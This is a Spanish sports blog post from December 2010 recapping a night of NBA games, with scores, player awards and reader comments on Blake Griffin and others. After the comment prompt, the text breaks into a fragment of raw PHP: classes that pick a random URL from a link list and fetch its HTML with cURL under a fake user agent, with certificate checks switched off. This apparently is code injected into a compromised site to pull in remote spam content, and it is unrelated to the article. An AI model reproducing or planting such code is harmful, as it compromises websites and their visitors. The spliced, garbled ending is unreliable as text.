La Crónica (26/12/2010)

27 de December de 2010 por TheDeerHunter

Jornada de resaca navideña. Partidos poco trascendentales pero que al final tuvieron un buen punto de emoción.

El más interesante a priori era el Atlanta@New Orleans, con dos equipos de alta irregularidad como quedó patente dentro del propio choque. Los visitantes se llevaron la primera parte con Joe Johnson y Marvin Williams demasiado sueltos. Luego hubo remontada con Okafor y West comiéndole la tostada a Horford y Smith. Chris Paul también cuajó un buen partido y, por una vez en su actual franquicia, Jack dio señales de vida (86-93).

Los Bulls se las vieron y se las desearon para doblegar a unos Pistons que últimamente muestran mejor color (95-92). McGrady, Prince o Hamilton ya no parecían el geriátrico del terror, e incluso Villanueva se permitió el lujo de poner un palmeo dentro para forzar la prórroga. La lotería se la llevó Chicago, pero a Rose se le ve fallón y junto a Boozer demasiado solos. Veremos si mañana a Detroit no les pasa factura el esfuerzo.

Por una vez Love&Beasley no se llevarán el premio al mayor esfuerzo en vano. La culpa es del segundo que le devolvió a Jamison el canastón que le había metido un instante antes para ganar el partido, muy mal defendido por cierto. Los Cavs no están para ninguna alegría… y encima esto (98-97).

Tampoco se lo llevará Blake Griffin. ¡Qué barbaridad, qué lujo y como estamos flipando con este pedazo de animal! Sólo le faltaba que le pongan un tío como Frye para defenderle o que Baron Davis empiece a carburar (103-108). Ayer destrozó a los Suns que no pudieron aprovechar el partidazo de Pietrus y que tampoco contaban con Vicente.

Destacan también las relativas sorpresas de Philadelphia en Denver, 95-89, (sin Melo) o de los Grizzlies en Indiana con un duelo al amanecer de Gay frente a Granger (104-90). Marc cuajó una de sus mejores actuaciones en lo que va de año, aunque tampoco nada del otro jueves. Por último los Spurs tuvieron un plácido encuentro (80-94) ante los Wizards, sin sus interiores titulares. Lo fue Rashard eso sí y, noticia, lo hizo bastante bien.

PREMIOS

MVP: Completísimo partido de Rudy Gay. 30 puntos, 8 rebotes, 5 asistencias, 5 robos y un tapón. Los 31 puntos y 11 rebotes de Carlos Boozer también son dignos de mención.

Rookie: 18 dobles-dobles van ya. El de ayer de 28 puntos y 12 rebotes. ¿Es Blake Griffin el mejor rookie desde hace años?

Sorpresa: Tras una buena temporada en los Bucks habíamos perdido un tanto la pista a Luke Ridnour. Anoche fue de los mejores de su equipo con 23 puntos (7 de 12), 5 rebotes y 6 asistencias en 28 minutos de juego.

Decepción: Premios del día para Kenyon Martin y Bellinelli, ambos con un fabuloso 0 de 6 en tiros de campo.

Esfuerzo en vano: Anthony Parker lideró a los Cavs con 21 puntos, 7 rebotes y 7 asistencia. Desgraciadamente para él, el canastón de Beasley le privó de la victoria.

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Griffin es el mejor rookie desde Lebron sin duda, y también superior a Lebron, sus números son prácticamente calcados a los de Tim Duncan, salvo que Duncan era mas taponador y poquito mejor lanzador de libres que hasta la fecha es el lunar de Griffin, algo que debe mejorar mucho. Una pasada lo de este tio, y además lo plasticos que resultan sus movimientos que hace que apetezca mucho ver sus partidos.

      Citar

  2. Cocinitas dice:
    #2

    Increible lo de Griffin me parece un jugadorazo, cuanto le falta a Kaman para volver???? creo q los clippers con kaman y davis a un buen nivel o un base de garantias son equipo de Playoff en el oeste el año que viene seguro.
    Una pena la lesión de Noah me hubiera gustado ver mas partidos del duo Noah-Boozer con un jugón como es Rose.

      Citar

  3. CAMPO2 dice:
    #3

    Alguien sabe de esta lesionado carter aparte de la cabeza y pensarse que siempre esta lesionado?

      Citar

  4. busky23 dice:
    #4

    Carter tiene una lesion cronica en la rodilla izquierda,de momento los médicos han descartado que haya que pasar por el quirófano,no hay fecha para su vuelta,aunque segun el periódico de Arizona se espera que sea a finales de semana.

      Citar

  5. Ru dice:
    #5

    Pues no sé si la vuelta de Kaman será beneficiosa para los Clippers dada la dimensión que ha adquirido Griffin.Casi sería más aconsejable un traspaso en busca de un buen base (Billups!!!) que le de consistencia a la nave de Clippers y fondo de armario en el puesto de C,mientras Blake,Eric Gordon y Bledsoe se consolidan en mayor o menor medida.Evidentemente mientras esté Baron Davis en el equipo inviable que Billups recale, pero el 1º ha sonado para Bobcats…que corran si quieren salir en el próximo anuncio de una conocida tienda “Yo no soy tonto”.

      Citar

  6. Mariano dice:
    #6

    Esta temporada ya está perdida para los Clippers, deberían hacer lo posible para terminar ultimos o penultimos y hacerse nuevamente con el 1 del draft 2011..

      Citar

  7. Scriers dice:
    #7

    Blake es el mejor Rookie desde Lebron, no hay dudas. Y ya va siendo hora que Ridnour espabile, que a minessota le hace falta una buena cabeza. y quien dijo que Rudy Gay es un chupön? lo es, pero está mejorando mucho en ese aspecto. ahora da 2 y pico asistencias por partido, que ya es mas que las ultinas temporadas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>